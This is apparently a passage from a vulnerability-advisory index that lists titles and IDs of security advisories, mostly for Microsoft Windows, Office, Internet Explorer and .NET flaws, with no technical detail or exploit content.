Lets Local Users Gain Elevated Privileges [1028905] (Microsoft Issues Fix for Exchange Server) Oracle Fusion Middleware Bugs Let Remote Users Deny Service and Access and Modify Data [1028904] (Microsoft Issues Fix for Exchange Server) Oracle PeopleSoft Products Bugs Let Remote Users Partially Access and Modify Data and Partially Deny Service [1028902] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028874] Windows Phone PEAP-MS-CHAPv2 Authentication Protocol Weakness May Let Remote Users Obtain Authentication Information [1028759] (Microsoft Issues Fix for Internet Explorer) Adobe Flash Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1028756] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028755] Microsoft Silverlight Null Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028753] Windows Media Format Runtime Parsing Flaw in WMV Video Decoder Lets Remote Users Execute Arbitrary Code [1028752] Microsoft DirectShow GIF Image Processing Flaw Lets Remote Users Execute Arbitrary Code [1028751] Microsoft Office TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028750] Microsoft Visual Studio .NET TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028749] Microsoft Lync TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028746] Windows Kernel-Mode Drivers Bugs Let Local Users Gain Elevated Privileges and Remote Users Execute Arbitrary Code [1028745] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028657] Windows Kernel Lets Local Users Obtain Information From Kernel Memory [1028656] Windows Print Spooler Memory Error Lets Local Users Gain Elevated Privileges [1028655] Windows TCP/IP Driver Bug Lets Remote Users Deny Service [1028651] Microsoft Internet Explorer Multiple Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1028650] Microsoft Office Buffer Overflow in PNG Image Processing Lets Remote Users Execute Arbitrary Code [1028591] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1028561] Windows Essentials URI Handling Flaw Discloses Potentially Sensitive Information to Remote Users [1028560] Microsoft Visio Discloses Information to Remote Users [1028558] Microsoft .NET Flaws Let Remote Users Bypass Authentication and Bypass XML File Signature Verification [1028557] Microsoft Malware Protection Engine Flaw Lets Remote Users Execute Arbitrary Code [1028554] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1028553] Microsoft Word RTF Shape Data Parsing Error Lets Remote Users Execute Arbitrary Code [1028552] Microsoft Publisher Multiple Bugs Let Remote Users Execute Arbitrary Code [1028551] Microsoft Lync Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028550] Microsoft Office Communicator Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028546] Windows HTTP Stack Header Processing Flaw Lets Remote Users Deny Service [1028545] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028514] Microsoft Internet Explorer Object Access Bug Lets Remote Users Execute Arbitrary Code [1028412] Microsoft SharePoint Server Discloses Files to Remote Authenticated Users [1028411] Microsoft Office Web Apps Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028410] Microsoft InfoPath Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028409] Microsoft Groove Server Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028408] Microsoft SharePoint Input Validation Flaw in HTML Sanitization Component Permits Cross-Site Scripting Attacks [1028407] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028405] Microsoft Active Directory LDAP Processing Flaw Lets Remote Users Deny Service [1028404] Microsoft Antimalware Client Path Name Flaw Lets Local Users Gain Elevated Privileges [1028403] Windows Kernel Race Conditions Let Local Users Gain Elevated Privileges [1028402] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges and Deny Service [1028398] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1028397] Windows Remote Desktop Bug in ActiveX Control Lets Remote Users Execute Arbitrary Code [1028394] NVIDIA Windows Driver Bugs Lets Local Users Gain Elevated Privileges [1028341] Windows Modern Mail Lets Remote Users Spoof URLs in Email Messages [1028281] Microsoft Office for Mac HTML Loading Bug Lets Remote Users Obtain Potentially Sensitive Information [1028279] Microsoft OneNote Buffer Validation Flaw Lets Remote Users Obtain Potentially Sensitive Information [1028278] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting and Denial of Service Attacks [1028276] Microsoft Visio Viewer Tree Object Type Confusion Error Lets Remote Users Execute Arbitrary Code [1028275] Microsoft Internet Explorer Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028274] Windows USB Driver Memory Error Lets Physically Local Users Gain Elevated Privileges [1028273] Microsoft Silverlight Memory Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028129] Windows NFS Server Null Dereference Lets Remote Users Deny Service [1028128] Windows TCP/IP Stack FIN WAIT Processing Flaw Lets Remote Users Deny Service [1028127] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028126] Windows Kernel Lets Local Users Gain Elevated Privileges [1028124] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1028123] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028119] Microsoft DirectShow Media Decompression Flaw Lets Remote Users Execute Arbitrary Code [1028118] Windows OLE Automation Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1028117] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Access Information Across Domains [1028116] Microsoft Internet Explorer Vector Markup Language Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027949] Microsoft .NET Open Data (OData) Protocol Bug Lets Remote Users Deny Service [1027948] Microsoft System Center Configuration Manager Input Validation Flaws Permit Cross-Site Scripting Attacks [1027947] Windows TCP/IP Stack Lets Remote Users Downgrade SSL/TLS Sessions [1027946] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027945] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027944] Windows Print Spooler Bug Lets Remote Users Execute Arbitrary Code [1027943] Microsoft XML Core Services (MSXML) XML Parsing Flaws Let Remote Users Execute Arbitrary Code [1027930] Microsoft Internet Explorer CDwnBindInfo Object Reuse Flaw Lets Remote Users Execute Arbitrary Code [1027870] Microsoft Internet Explorer Discloses Mouse Location to Remote Users [1027860] Windows IP-HTTPS Certificate Processing Flaw Lets Remote Users Bypass Security Restrictions [1027859] Microsoft DirectPlay Heap Overflow Lets Remote Users Execute Arbitrary Code [1027857] Microsoft Exchange Server RSS Feed Bug Lets Remote Users Deny Service [1027856] Windows Kernel-Mode Drivers Font Processing Flaw Lets Remote Users Execute Arbitrary Code [1027855] Windows File Handling Component Memory Error Lets Remote Users Execute Arbitrary Code [1027852] Microsoft Word RTF Parsing Error Lets Remote Users Execute Arbitrary Code [1027851] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027753] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027752] Microsoft Excel Buffer Overflow, Memory Corruption, and Use-After-Free Errors Let Remote Users Execute Arbitrary Code [1027751] Microsoft Internet Information Server (IIS) FTP Server Lets Remote Users Obtain Files and Local Users Obtain Passwords [1027750] Windows Kernel Multiple Bugs Let Remote Users Execute Arbitrary Code and Local Users Obtain Elevated Privileges [1027749] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027748] Windows Shell Briefcase Integer Overflow and Underflow Let Remote Users Execute Arbitrary Code [1027647] EMC NetWorker Module for Microsoft Applications Lets Remote Users Execute Arbitrary Code and Local Users Obtain Passwords [1027629] Microsoft Office InfoPath HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027628] Microsoft Office Communicator HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027627] Microsoft Lync HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027626] Microsoft SharePoint HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027625] Microsoft Groove Server HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027623] Microsoft SQL Server Input Validation Flaw in Reporting Services Permits Cross-Site Scripting Attacks [1027622] Windows Kernel Integer Overflow Lets Local Users Gain Elevated Privileges [1027621] Microsoft Works Heap Corruption Flaw Lets Remote Users Execute Arbitrary Code [1027620] Microsoft Kerberos Null Pointer Dereference Lets Remote Users Deny Service [1027618] Microsoft Word Memory Errors Let Remote Users Execute Arbitrary Code [1027583] Adobe AIR Applications and Adobe Software for Windows Have Compromised Certificates [1027555] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027541] Windows Phone Certificate Validation Flaw Lets Remote Users Spoof Secure E-mail Servers [1027538] Microsoft Internet Explorer execCommand Flaw Lets Remote Users Execute Arbitrary Code [1027522] Citrix XenApp Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1027512] Microsoft System Center Configuration Manager Input Validation Flaw Permits Cross-Site Scripting Attacks [1027511] Microsoft Visual Studio Team Foundation Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1027394] Microsoft Visio Buffer Overflow in Processing DXF Format Files Lets Remote Users Execute Arbitrary Code [1027393] Microsoft Office CGM Graphics File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027392] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1027391] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027390] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1027379] Windows Print Spooler Remote Administration Protocol Format String and Buffer Overflows Let Remote Users Deny Service [1027378] Windows Remote Desktop RDP Processing Flaw Lets Remote Users Execute Arbitrary Code [1027335] Citrix Access Gateway Plug-in for Windows ActiveX Control Buffer Overflows Let Remote Users Execute Arbitrary Code [1027295] Microsoft SharePoint Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027294] Microsoft Exchange Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027234] Microsoft Office for Mac Folder Permission Flaw Lets Local Users Gain Elevated Privileges [1027233] Windows Schannel Lets Remote Users Decrypt TLS Traffic [1027232] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting, Information Disclosure, and URL Redirection Attacks [1027231] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027230] Windows Shell Command Injection Flaw Lets Remote Users Execute Arbitrary Code [1027229] Microsoft Office DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027228] Microsoft Visual Basic for Applications DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027227] Microsoft Data Access Components (MDAC) ADO Cachesize Buffer Overflow Lets Remote Users Execute Arbitrary Code [1027226] Microsoft Internet Explorer Deleted Object Access Bugs Let Remote Users Execute Arbitrary Code [1027223] Microsoft IIS Web Server Discloses Potentially Sensitive Information to Remote Users [1027157] Microsoft XML Core Services (MSXML) Object Access Error Lets Remote Users Execute Arbitrary Code [1027155] Windows Kernel Bug in User Mode Scheduler Lets Local Users Gain Elevated Privileges [1027154] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027151] Microsoft Dynamics AX Input Validation Flaw Permits Cross-Site Scripting Attacks [1027150] Microsoft Lync DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027149] Microsoft .NET Memory Access Bug Lets Remote Users Execute Arbitrary Code [1027148] Windows Remote Desktop Bug Lets Remote Users Execute Arbitrary Code [1027147] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Conduct Cross-Site Scripting Attacks, and Obtain Potentially Sensitive Information [1027089] PHP Windows com_print_typeinfo() Buffer Overflow Lets Local Users Gain Elevated Privileges [1027048] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code and Deny Service [1027044] Windows TCP/IP Stack Lets Remote Users Bypass the Firewall and Local Users Gain Elevated Privileges [1027042] Microsoft Visio Viewer Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027041] Microsoft Office Excel File Memory Corruption Errors and Heap Overflows Let Remote Users Execute Arbitrary Code [1027040] Microsoft Silverlight Double Free Memory Error Lets Remote Users Execute Arbitrary Code [1027039] Windows OS Lets Remote Users Cause Arbitrary Code to Be Executed and Lets Local Users Gain Elevated Privileges [1027038] Microsoft GDI+ Bugs Let Remote Users Execute Arbitrary Code [1027036] Microsoft .NET Framework Serialization Bugs Let Remote Users Execute Arbitrary Code [1027035] Microsoft Word RTF Processing Flaw Lets Remote Users Execute Arbitrary Code [1027020] Windows Win32k.sys Memory Error Lets Remote Users Deny Service [1027003] HP Insight Management Agents for Windows Server Bugs Permit Cross-Site Scripting, Cross-Site Request Forgery, and URL Redirection Attacks [1026911] Microsoft Office WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026910] Microsoft Works WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026909] Microsoft Forefront Unified Access Gateway Bugs Let Remote Users Obtain Potentially Sensitive Information and Conduct Browser Redirection Attacks [1026907] Microsoft .NET Parameter Validation Flaw Lets Remote Users Execute Arbitrary Code [1026906] Windows Authenticode Signature Verification Can Be Bypassed By Remote or Local Users [1026901] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1026794] Microsoft DirectWrite Unicode Character Processing Flaw Lets Remote Users Deny Service [1026793] Windows Kernel PostMessage() Lets Local Users Gain Elevated Privileges [1026792] Microsoft Visual Studio Lets Local Users Gain Elevated Privileges [1026791] Microsoft Expression Design DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026790] Windows Remote Desktop Protocol Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1026789] Microsoft DNS Server Lets Remote Users Deny Service [1026686] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting Attacks [1026684] Microsoft Visio Viewer Multiple Bugs Let Remote Users Execute Arbitrary Code [1026683] Windows XP Indeo Codec DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026682] Windows Color Control Panel DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026681] Microsoft Silverlight Bugs Let Remote Users Execute Arbitrary Code [1026680] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1026679] Windows Kernel Keyboard Layout Use-After-Free Lets Local Users Gain Elevated Privileges [1026678] Windows C Runtime Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1026677] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1026499] Microsoft Anti-Cross Site Scripting Library Flaw May Permit Cross-Site Scripting Attacks [1026498] Windows Schannel Lets Remote Users Decrypt SSL/TLS Traffic [1026495] Windows Client-Server Run-time Subsystem Unicode Processing Flaw Lets Local Users Gain Elevated Privileges [1026494] Windows Object Packager Lets Remote Users Execute Arbitrary Code [1026493] Windows Kernel Lets Local Users Bypass the SafeSEH Security Feature [1026492] Windows Media Player Bugs Let Remote Users Execute Arbitrary Code [1026479] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Commands, Access User Accounts, and Redirect Users [1026469] Microsoft ASP.NET Hash Table Collision Bug Lets Remote Users Deny Service [1026450] Windows Win32k.sys GDI Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026426] RSA SecurID Software Token for Windows DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026418] Windows OLE Processing Error Lets Remote Users Cause Arbitary Code to Be Executed on the Target User's System [1026417] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1026416] Microsoft Office IME (Chinese) Lets Local Users Gain Elevated Privileges [1026415] Windows Kernel Object Initialization Error Lets Local Users Gain Elevated Privileges [1026414] Microsoft Publisher Multiple Errors Let Remote Users Execute Arbitrary Code [1026413] Microsoft Internet Explorer DLL Loading Error Lets Remote Users Execute Arbitrary Code and HTML Processing Bugs Let Remote Users Obtain Information [1026412] Microsoft Active Directory Memory Access Error Lets Remote Authenticated Users Execute Arbitrary Code [1026411] Microsoft PowerPoint DLL Loading and OfficeArt Object Processing Flaws Let Remote Users Execute Arbitrary Code [1026410] Microsoft Office Excel File Memory Error Lets Remote Users Execute Arbitrary Code [1026409] Microsoft Office Use-After-Free Bug Lets Remote Users Execute Arbitrary Code [1026408] Microsoft Internet Explorer Error in Microsoft Time Component Lets Remote Users Execute Arbitrary Code [1026407] Windows Media Center DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026406] Windows Media Player DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026347] Windows Win32k.sys Keyboard Layout Bug Lets Local Users Deny Service [1026294] Microsoft Active Directory CRL Validation Flaw Lets Remote Users Bypass Authentication [1026293] Windows Mail DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026292] Windows Meeting Space DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026291] Windows Win32k.sys Kernel-Mode Drivers Array Index Validation Flaw Lets Remote Users Deny Service [1026290] Windows TCP/IP Stack Integer Overflow Lets Remote Users Execute Arbitrary Code [1026220] Microsoft Publisher 'Pubconv.dll' Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026169] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permits Cross-Site Scripting, HTTP Response Splitting, and Denial of Service Attacks [1026168] Microsoft Host Integration Server Bugs Let Remote Users Deny Service [1026166] Windows Media Center DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026165] Windows Kernel-Mode Drivers Memory Corruption Errors Let Remote Users Execute Arbitrary Code and Local Users Deny Service and Gain Elevated Privileges [1026164] Microsoft Active Accessibility Component DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026162] Microsoft .NET Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026161] Microsoft Silverlight Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026160] Microsoft Internet Explorer Multiple Flaws Let Remote Users Execute Arbitrary Code [1026040] Microsoft SharePoint Multiple Flaws Permit Cross-Site Scripting and Information Disclosure Attacks [1026039] Microsoft Office DLL Loading Error and Unspecified Bug Lets Remote Users Execute Arbitrary Code [1026038] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1026020] Windows 2008 R1 CSRSS Null Pointer Dereference Lets Local Users Deny Service [1026005] Windows Script Host DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025905] Microsoft .NET Socket Trust Validation Error Lets Remote Users Obtain Information and Redirect Certain Network Traffic [1025904] Windows Kernel File Metadata Parsing Error Lets Remote Users Deny Service [1025903] Microsoft Visual Studio Input Validation Hole Permits Cross-Site Scripting Attacks [1025902] Microsoft ASP.NET Chart Control Remote File Disclosure [1025901] Windows Remote Desktop Protocol (RDP) Memory Access Error Lets Remote Users Deny Service [1025900] Windows TCP/IP Stack Flaws Let Remote Users Deny Service [1025899] Windows Client-Server Run-time Subsystem 'Winsrv.dll' Lets Local Users Gain Elevated Privileges [1025898] Windows Remote Access Service NDISTAPI Driver Lets Local Users Gain Elevated Privileges [1025897] Windows Remote Desktop Web Access Validation Flaw Permits Cross-Site Scripting Attacks [1025896] Microsoft Visio Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025895] Microsoft Data Access Components Insecure Library Loading Lets Remote Users Execute Arbitrary Code [1025894] Microsoft DNS Server Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1025893] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025885] Windows Client-Server Run-time Subsystem SrvGetConsoleTitle() Flaw Lets Local Users Deny Service [1025847] Microsoft Internet Explorer Flaw in Processing EUC-JP Encoded Characters Lets Remote Users Conduct Cross-Site Scripting Attacks [1025775] Citrix Access Gateway Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1025763] Microsoft Visio May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025762] Windows Client-Server Run-time Subsystem Bugs Let Local Users Gain Elevated Privileges [1025761] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1025675] Microsoft Word Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1025655] Microsoft MHTML Input Validation Hole Permits Cross-Site Scripting Attacks [1025654] Microsoft Internet Explorer Vector Markup Language (VML) Object Access Error Lets Remote Users Execute Arbitrary Code [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025649] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025648] Microsoft SQL Server XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025647] Microsoft Visual Studio XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025646] Microsoft Office InfoPath XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025645] Windows Server Message Block Request Parsing Flaw Lets Remote Users Deny Service [1025644] Microsoft Hyper-V VMBus Packet Validation Flaw Lets Local Users Deny Service [1025642] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025641] Microsoft .NET JIT Compiler Validation Flaw Lets Remote Users Execute Arbitrary Code [1025640] Windows Server Message Block Parsing Error Lets Remote Users Execute Arbitrary Code [1025639] Microsoft Distributed File System Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1025638] Windows Kernel Memory Corruption Error in Win32k.sys Lets Remote Users Execute Arbitrary Code [1025637] Microsoft Forefront Threat Management Gateway Bounds Validation Flaw in Winsock Provider Lets Remote Users Execute Arbitrary Code [1025636] Microsoft .NET Array Offset Error Lets Remote Users Execute Code [1025635] Microsoft Silverlight Array Offset Error Lets Remote Users Execute Arbitrary Code [1025513] Microsoft PowerPoint Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025431] HP Insight Control for Windows Lets Remote Authenticated Users Gain Elevated Privileges and Remote Users Conduct Cross-Site Request Forgery Attacks [1025360] Microsoft Reader Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025359] Microsoft MHTML Stack Overflow Lets Remote Users Execute Arbitrary Code [1025348] Windows Operating System Loader Driver Signing Restrictions Can Be Bypassed [1025347] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1025346] Microsoft Foundation Classes May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025345] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1025344] Microsoft WordPad Parsing Error Lets Remote Users Execute Arbitrary Code [1025343] Microsoft Office DLL Loading and Graphic Object Processing Flaws Let Remote Users Execute Arbitrary Code [1025340] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1025337] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025335] Microsoft GDI+ EMF Image Integer Overflow Lets Remote Users Execute Arbitrary Code [1025334] Microsoft OpenType Compact Font Format (CFF) Driver Stack Overflow Lets Remote Users Execute Arbitrary Code [1025333] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1025332] Windows DNS Resolution LLMNR Processing Flaw Lets Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1025331] Microsoft .NET Stack Corruption Error in JIT Compiler Lets Remote Users Execute Arbitrary Code [1025329] Windows SMB Server Lets Remote Users Execute Arbitrary Code [1025328] Windows Server Message Block Parsing Errors Let Remote Users Execute Arbitrary Code [1025327] Microsoft Internet Explorer Bugs Let Remote Users Obtain Potentially Sensitive Information, Execute Arbitrary Code, and Hijack User Clicks [1025172] Windows Remote Desktop Client DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025171] Microsoft Groove DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025170] Microsoft DirectShow DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025169] Windows Media Player and Windows Media Center Error in Parsing '.dvr-ms' Files Lets Remote Users Execute Arbitrary Code [1025164] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar [1025117] Microsoft Malware Protection Engine Registry Processing Error Lets Local Users Gain Elevated Privileges [1025086] Microsoft Active Directory Heap Overflow in Processing BROWSER ELECTION Packets May Let Remote Users Execute Arbitrary Code [1025049] Microsoft Local Security Authority Subsystem Service (LSASS) Lets Local Users Gain Elevated Privileges [1025048] Windows Kerberos Lets Local Users Gain Elevated Privileges [1025047] Windows Driver Flaws Lets Local Users Gain Elevated Privileges [1025046] Windows Kernel Lets Local Users Gain Elevated Privileges [1025045] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1025044] Microsoft JScript and VBScript Disclose Information to Remote Users [1025043] Microsoft Visio Memory Corruption Error in Processing Visio Files Lets Remote Users Execute Arbitrary Code [1025042] Microsoft Active Directory SPN Collosions May Let Remote Authenticated Users Deny Service [1025038] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1025034] Windows OpenType Compact Font Format Bug Lets Remote Users Execute Arbitrary Code [1025003] Microsoft MHTML Input Validation Hole May Permit Cross-Site Scripting Attacks [1024948] Windows Backup Manager May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024947] Microsoft Data Access Components (MDAC) Memory Corruption Errors in Processing DSN Data and ADO Records Let Remote Users Execute Arbitrary Code [1024940] Microsoft Internet Explorer Use-After-Free in 'mshtml.dll' May Let Remote Users Execute Arbitrary Code [1024932] Windows Graphics Rendering Engine Stack Overflow in Processing Thumbnail Images Lets Remote Users Execute Arbitrary Code [1024925] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024922] Microsoft Internet Explorer Recursive CSS Import Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024921] Microsoft IIS FTP Server Lets Remote Users Deny Service [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024887] Microsoft Office Graphics Filters Let Remote Users Execute Arbitrary Code [1024886] Microsoft SharePoint Input Validation Flaw in Processing SOAP Requests Let Remote Users Execute Arbitrary Code [1024885] Microsoft Publisher Bugs Let Remote Users Execute Arbitrary Code [1024884] Microsoft Hyper-V Input Validation Flaw Lets Local Guest Operating System Users Deny Service [1024883] Windows Netlogon Service Lets Remote Authenticated Users Deny Service [1024882] Windows Consent User Interface Lets Local Users Gain Elevated Privileges [1024881] Windows Routing and Remote Access NDProxy Buffer Overflow Lets Local Users Gain Elevated Privileges [1024880] Windows Kernel Buffer Overflows and Memory Corruption Errors Let Local Users Gain Elevated Privileges [1024878] Windows Address Book May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024876] Windows Media Encoder May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024875] Windows Movie Maker May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024873] Windows OpenType Font Driver Memory Corruption Flaws Let Remote Users Execute Arbitrary Code [1024872] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024790] Microsoft Outlook Attachment Processing Flaw Lets Remote Users Deny Service [1024787] Windows Kernel Buffer Overflow in RtlQueryRegistryValues() Lets Local Users Gain Elevated Privileges [1024707] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permit Cross-Site Scripting and URL Redirection Attacks [1024706] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1024705] Microsoft Office Flaws Let Remote Users Execute Arbitrary Code [1024676] Microsoft Internet Explorer Freed Object Invalid Flag Reference Access Lets Remote Users Execute Arbitrary Code [1024675] HP Insight Control Performance Management for Windows Lets Remote Users Download Arbitrary Files [1024673] HP Insight Recovery for Windows Flaws Permit Cross-Site Scripting and Directory Traversal Attacks [1024672] HP Insight Control Performance Management for Windows Flaws Permit Cross-Site Scripting and Cross-Site Request Forgery Attacks and Let Remote Authenticated Users Gain Elevated Privileges [1024667] HP Insight Managed System Setup Wizard for Windows Lets Remote Users Download Arbitrary Files [1024630] Microsoft Internet Explorer 'window.onerror' Callback Lets Remote Users Obtain Information From Other Domains [1024572] Sun Java System Directory Server Identity Synchronization for Windows Lets Local Users Access and Modify Data and Deny Service [1024559] Microsoft SharePoint Input Validation Hole in SafeHTML Permits Cross-Site Scripting Attacks [1024558] Microsoft Cluster Service Disk Permission Flaw Lets Local Users Gain Elevated Privileges [1024557] Microsoft Foundation Classes Library Buffer Overflow in Window Title Lets Remote Users Execute Arbitrary Code [1024556] Windows Schannel TLSv1 Processing Bug Lets Remote Users Deny Service [1024555] Windows Shell COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024554] Windows OpenType Font (OTF) Format Driver Memory Corruption Flaw Lets Local Users Gain Elevated Privileges [1024553] Windows LPC Buffer Overflow Lets Local Users Gain Elevated Privileges [1024552] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024551] Microsoft Office Word Processing Flaws Let Remote Users Execute Arbitrary Code [1024550] Windows Media Player Object Deallocation Error Lets Remote Users Execute Arbitrary Code [1024549] Windows Common Control Library Heap Overflow Lets Remote Users Execute Arbitrary Code [1024547] Windows win32k.sys Kernel-mode Driver Bugs Let Local Users Gain Elevated Privileges [1024546] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Obtain Information, and Conduct Cross-Site Scripting Attacks [1024545] Windows Media Player Use-After-Free Memory Error in Network Sharing Service Lets Remote Users Execute Arbitrary Code [1024544] Windows Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1024543] Microsoft .NET Framework JIT Compiler Memory Access Error Lets Remote Users Execute Arbitrary Code [1024537] Windows LPC Processing Flaw Lets Local Users Deny Service [1024496] Microsoft Internet Information Server (IIS) Web Server Stack Overflow in Reading POST Data Lets Remote Users Deny Service [1024459] Microsoft 